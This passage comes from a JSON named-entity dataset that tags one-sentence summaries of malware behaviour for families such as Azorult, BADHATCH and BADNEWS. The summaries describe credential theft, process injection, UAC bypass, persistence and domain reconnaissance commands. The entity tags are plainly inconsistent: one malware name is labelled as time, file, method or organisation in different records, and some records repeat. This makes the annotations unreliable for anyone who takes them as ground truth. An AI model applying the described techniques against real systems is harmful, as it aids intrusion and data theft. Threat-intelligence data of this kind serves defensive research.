"`NtCurrentPeb`", "and", "`GetLogicalDrives`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "AvosLocker", "has", "enumerated", "shared", "drives", "on", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "used", "XOR-encoded", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "discovered", "system", "processes", "by", "calling", "`RmGetList`." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "AvosLocker", "has", "been", "executed", "via", "the", "`RunOnce`", "Registry", "key", "to", "run", "itself", "on", "safe", "mode." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "can", "restart", "a", "compromised", "machine", "in", "safe", "mode." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "terminated", "specific", "processes", "before", "encryption." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker’s", "Linux", "variant", "has", "terminated", "ESXi", "virtual", "machines." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "AvosLocker", "has", "checked", "the", "system", "time", "before", "and", "after", "encryption." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "call", "WTSQueryUserToken", "and", "CreateProcessAsUser", "to", "start", "a", "new", "process", "with", "local", "system", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "steal", "credentials", "in", "files", "belonging", "to", "common", "software", "such", "as", "Skype,", "Telegram,", "and", "Steam." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Tool" ] }, { "tokens": [ "Azorult", "can", "steal", "credentials", "from", "the", "victim's", "browser." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "uses", "an", "XOR", "key", "to", "decrypt", "content", "and", "uses", "Base64", "to", "decode", "the", "C2", "address." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "delete", "files", "from", "victim", "machines." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "recursively", "search", "for", "files", "in", "folders", "and", "collects", "files", "from", "the", "desktop", "with", "certain", "extensions." ], "ner_tags": [ "B-Idus", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "download", "and", "execute", "additional", "files.", "Azorult", "has", "also", "downloaded", "a", "ransomware", "payload", "called", "Hermes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Azorult", "can", "collect", "a", "list", "of", "running", "processes", "by", "calling", "CreateToolhelp32Snapshot." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Azorult", "can", "decrypt", "the", "payload", "into", "memory,", "create", "a", "new", "suspended", "process", "of", "itself,", "then", "inject", "a", "decrypted", "payload", "to", "the", "new", "process", "and", "resume", "new", "process", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "I-Way", "I-Way", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "check", "for", "installed", "software", "on", "the", "system", "under", "the", "Registry", "key", "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "capture", "screenshots", "of", "the", "victim’s", "machines." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "encrypt", "C2", "traffic", "using", "XOR." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "B-Features", "O", "B-Way" ] }, { "tokens": [ "Azorult", "can", "collect", "the", "machine", "information,", "system", "architecture,", "the", "OS", "version,", "computer", "name,", "Windows", "product", "name,", "the", "number", "of", "CPU", "cores,", "video", "card", "information,", "and", "the", "system", "language." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "collect", "host", "IP", "information", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "collect", "the", "username", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Azorult", "can", "collect", "the", "time", "zone", "information", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "\"ZR\"", "variant", "of", "BACKSPACE", "will", "check", "to", "see", "if", "known", "host-based", "firewalls", "are", "installed", "on", "the", "infected", "systems.", "BACKSPACE", "will", "attempt", "to", "establish", "a", "C2", "channel,", "then", "will", "examine", "open", "windows", "to", "identify", "a", "pop-up", "from", "the", "firewall", "software", "and", "will", "simulate", "a", "mouse-click", "to", "allow", "the", "connection", "to", "proceed." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversaries", "can", "direct", "BACKSPACE", "to", "upload", "files", "to", "the", "C2", "Server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "allows", "adversaries", "to", "search", "for", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "The", "\"ZJ\"", "variant", "of", "BACKSPACE", "allows", "\"ZJ", "link\"", "infections", "with", "Internet", "access", "to", "relay", "traffic", "from", "\"ZJ", "listen\"", "to", "a", "command", "server." ], "ner_tags": [ "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "is", "capable", "of", "deleting", "Registry", "keys,", "sub-keys,", "and", "values", "on", "a", "victim", "system." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "attempts", "to", "avoid", "detection", "by", "checking", "a", "first", "stage", "command", "and", "control", "server", "to", "determine", "if", "it", "should", "connect", "to", "the", "second", "stage", "server,", "which", "performs", "\"louder\"", "interactions", "with", "the", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Newer", "variants", "of", "BACKSPACE", "will", "encode", "C2", "communications", "with", "a", "custom", "system." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "may", "collect", "information", "about", "running", "processes." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "is", "capable", "of", "enumerating", "and", "making", "modifications", "to", "an", "infected", "system's", "Registry." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "achieves", "persistence", "by", "creating", "a", "shortcut", "to", "itself", "in", "the", "CSIDL_STARTUP", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "achieves", "persistence", "by", "creating", "a", "shortcut", "to", "itself", "in", "the", "CSIDL_STARTUP", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "its", "initial", "execution,", "BACKSPACE", "extracts", "operating", "system", "information", "from", "the", "infected", "host." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BACKSPACE", "uses", "HTTP", "as", "a", "transport", "to", "communicate", "with", "its", "command", "server." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Adversaries", "can", "direct", "BACKSPACE", "to", "execute", "from", "the", "command", "line", "on", "infected", "hosts,", "or", "have", "BACKSPACE", "create", "a", "reverse", "shell." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BADCALL", "disables", "the", "Windows", "firewall", "before", "binding", "to", "a", "port." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADCALL", "modifies", "the", "firewall", "Registry", "key", "<code>SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfileGloballyOpenPorts\\\\List</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BADCALL", "communicates", "on", "ports", "443", "and", "8000", "with", "a", "FakeTLS", "method." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "BADCALL", "uses", "a", "FakeTLS", "method", "during", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BADCALL", "functions", "as", "a", "proxy", "server", "between", "the", "victim", "and", "C2", "server." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADCALL", "encrypts", "C2", "traffic", "using", "an", "XOR/ADD", "cipher." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "BADCALL", "collects", "the", "computer", "name", "and", "host", "name", "on", "the", "compromised", "system." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADCALL", "collects", "the", "network", "adapter", "information." ], "ner_tags": [ "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "BADFLICK", "has", "compressed", "data", "using", "the", "aPLib", "compression", "library." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "BADFLICK", "has", "uploaded", "files", "from", "victims'", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADFLICK", "can", "decode", "shellcode", "using", "a", "custom", "rotating", "XOR", "cipher." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "BADFLICK", "has", "searched", "for", "files", "on", "the", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADFLICK", "has", "download", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "BADFLICK", "has", "relied", "upon", "users", "clicking", "on", "a", "malicious", "attachment", "delivered", "through", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BADFLICK", "has", "been", "distributed", "via", "spearphishing", "campaigns", "containing", "malicious", "Microsoft", "Word", "documents." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O" ] }, { "tokens": [ "BADFLICK", "has", "captured", "victim", "computer", "name,", "memory", "space,", "and", "CPU", "details." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADFLICK", "has", "captured", "victim", "IP", "address", "details." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADFLICK", "has", "delayed", "communication", "to", "the", "actor-controlled", "IP", "address", "by", "5", "minutes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "beacon", "to", "a", "hardcoded", "C2", "IP", "address", "using", "TLS", "encryption", "every", "5", "minutes." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "inject", "itself", "into", "a", "new", "`svchost.exe", "-k", "netsvcs`", "process", "using", "the", "asynchronous", "procedure", "call", "(APC)", "queue." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Way", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "utilize", "the", "CMSTPLUA", "COM", "interface", "and", "the", "SilentCleanup", "task", "to", "bypass", "UAC." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "malicious", "PowerShell", "commands", "can", "be", "encoded", "with", "base64." ], "ner_tags": [ "B-Way", "B-Tool", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "use", "`net.exe", "group", "\"domain", "admins\"", "/domain`", "to", "identify", "Domain", "Administrators." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "use", "`nltest.exe", "/domain_trusts`", "to", "discover", "domain", "trust", "relationships", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "has", "the", "ability", "to", "execute", "a", "malicious", "DLL", "by", "injecting", "into", "`explorer.exe`", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "has", "an", "embedded", "second", "stage", "DLL", "payload", "within", "the", "first", "stage", "of", "the", "malware." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "be", "compressed", "with", "the", "ApLib", "algorithm." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "BADHATCH", "can", "exfiltrate", "data", "over", "the", "C2", "channel." ], "ner_tags": [ "B-SamFile", "O", "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "has", "the", "ability", "to", "delete", "PowerShell", "scripts", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "emulate", "an", "FTP", "server", "to", "connect", "to", "actor-controlled", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "BADHATCH", "has", "the", "ability", "to", "load", "a", "second", "stage", "malicious", "DLL", "file", "onto", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "utilize", "Native", "API", "functions", "such", "as,", "`ToolHelp32`", "and", "`Rt1AdjustPrivilege`", "to", "enable", "`SeDebugPrivilege`", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "check", "for", "open", "ports", "on", "a", "computer", "by", "establishing", "a", "TCP", "connection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "check", "a", "user's", "access", "to", "the", "C$", "share", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "perform", "pass", "the", "hash", "on", "compromised", "machines", "with", "x64", "versions." ], "ner_tags": [ "B-Idus", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "utilize", "`powershell.exe`", "to", "execute", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "retrieve", "a", "list", "of", "running", "processes", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "inject", "itself", "into", "an", "existing", "explorer.exe", "process", "by", "using", "`RtlCreateUserThread`." ], "ner_tags": [ "B-Way", "O", "B-Way", "I-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-Way" ] }, { "tokens": [ "BADHATCH", "can", "use", "SOCKS4", "and", "SOCKS5", "proxies", "to", "connect", "to", "actor-controlled", "C2", "servers.", "BADHATCH", "can", "also", "emulate", "a", "reverse", "proxy", "on", "a", "compromised", "machine", "to", "connect", "with", "actor-controlled", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "copy", "a", "large", "byte", "array", "of", "64-bit", "shellcode", "into", "process", "memory", "and", "execute", "it", "with", "a", "call", "to", "`CreateThread`." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "use", "a", "PowerShell", "object", "such", "as,", "`System.Net.NetworkInformation.Ping`", "to", "ping", "a", "computer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "use", "`schtasks.exe`", "to", "gain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "take", "screenshots", "and", "send", "them", "to", "an", "actor-controlled", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-Idus", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "obtain", "current", "system", "information", "from", "a", "compromised", "machine", "such", "as", "the", "`SHELL", "PID`,", "`PSVERSION`,", "`HOSTNAME`,", "`LOGONSERVER`,", "`LASTBOOTUP`,", "drive", "information,", "OS", "type/version,", "bitness,", "and", "hostname." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "execute", "`netstat.exe", "-f`", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "obtain", "logged", "user", "information", "from", "a", "compromised", "machine", "and", "can", "execute", "the", "command", "`whoami.exe`." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "BADHATCH", "can", "obtain", "the", "`DATETIME`", "and", "`UPTIME`", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "impersonate", "a", "`lsass.exe`", "or", "`vmtoolsd.exe`", "token." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "BADHATCH", "can", "use", "HTTP", "and", "HTTPS", "over", "port", "443", "to", "communicate", "with", "actor-controlled", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "be", "utilized", "to", "abuse", "`sslip.io`,", "a", "free", "IP", "to", "domain", "mapping", "service,", "as", "part", "of", "actor-controlled", "C2", "channels." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "use", "`cmd.exe`", "to", "execute", "commands", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "utilize", "WMI", "to", "collect", "system", "information,", "create", "new", "processes,", "and", "run", "malicious", "PowerShell", "scripts", "on", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "BADHATCH", "can", "use", "WMI", "event", "subscriptions", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "BADNEWS", "monitors", "USB", "devices", "and", "copies", "files", "with", "certain", "extensions", "to", "a", "predefined", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "can", "use", "multiple", "C2", "channels,", "including", "RSS", "feeds,", "Github,", "forums,", "and", "blogs." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "B-Tool", "O", "B-Tool" ] }, { "tokens": [ "BADNEWS", "typically", "loads", "its", "DLL", "file", "into", "a", "legitimate", "signed", "Java", "or", "VMware", "executable." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "encrypting", "C2", "data,", "BADNEWS", "converts", "it", "into", "a", "hexadecimal", "representation", "and", "then", "encodes", "it", "into", "base64." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "it", "first", "starts,", "BADNEWS", "crawls", "the", "victim's", "local", "drives", "and", "collects", "documents", "with", "the", "following", "extensions:", ".doc,", ".docx,", ".pdf,", ".ppt,", ".pptx,", "and", ".txt." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "When", "it", "first", "starts,", "BADNEWS", "crawls", "the", "victim's", "mapped", "drives", "and", "collects", "documents", "with", "the", "following", "extensions:", ".doc,", ".docx,", ".pdf,", ".ppt,", ".pptx,", "and", ".txt." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "BADNEWS", "copies", "files", "with", "certain", "extensions", "from", "USB", "devices", "to", "a", "predefined", "directory." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "collects", "C2", "information", "via", "a", "dead", "drop", "resolver." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "identifies", "files", "with", "certain", "extensions", "from", "USB", "devices,", "then", "copies", "them", "to", "a", "predefined", "directory." ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "is", "capable", "of", "downloading", "additional", "files", "through", "C2", "channels,", "including", "a", "new", "version", "of", "itself." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "is", "sometimes", "signed", "with", "an", "invalid", "Authenticode", "certificate", "in", "an", "apparent", "effort", "to", "make", "it", "look", "more", "legitimate." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "When", "it", "first", "starts,", "BADNEWS", "spawns", "a", "new", "thread", "to", "log", "keystrokes." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "copies", "documents", "under", "15MB", "found", "on", "the", "victim", "system", "to", "is", "the", "user's", "<code>%temp%\\SMB\\</code>", "folder.", "It", "also", "copies", "files", "from", "USB", "devices", "to", "a", "predefined", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "attempts", "to", "hide", "its", "payloads", "using", "legitimate", "filenames." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "has", "a", "command", "to", "download", "an", ".exe", "and", "execute", "it", "via", "CreateProcess", "API.", "It", "can", "also", "run", "with", "ShellExecute." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "checks", "for", "new", "hard", "drives", "on", "the", "victim,", "such", "as", "USB", "devices,", "by", "listening", "for", "the", "WM_DEVICECHANGE", "window", "message." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "BADNEWS", "has", "a", "command", "to", "download", "an", ".exe", "and", "use", "process", "hollowing", "to", "inject", "it", "into", "a", "new", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "installs", "a", "registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "creates", "a", "scheduled", "task", "to", "establish", "by", "executing", "a", "malicious", "payload", "every", "subsequent", "minute." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "BADNEWS", "has", "a", "command", "to", "take", "a", "screenshot", "and", "send", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", 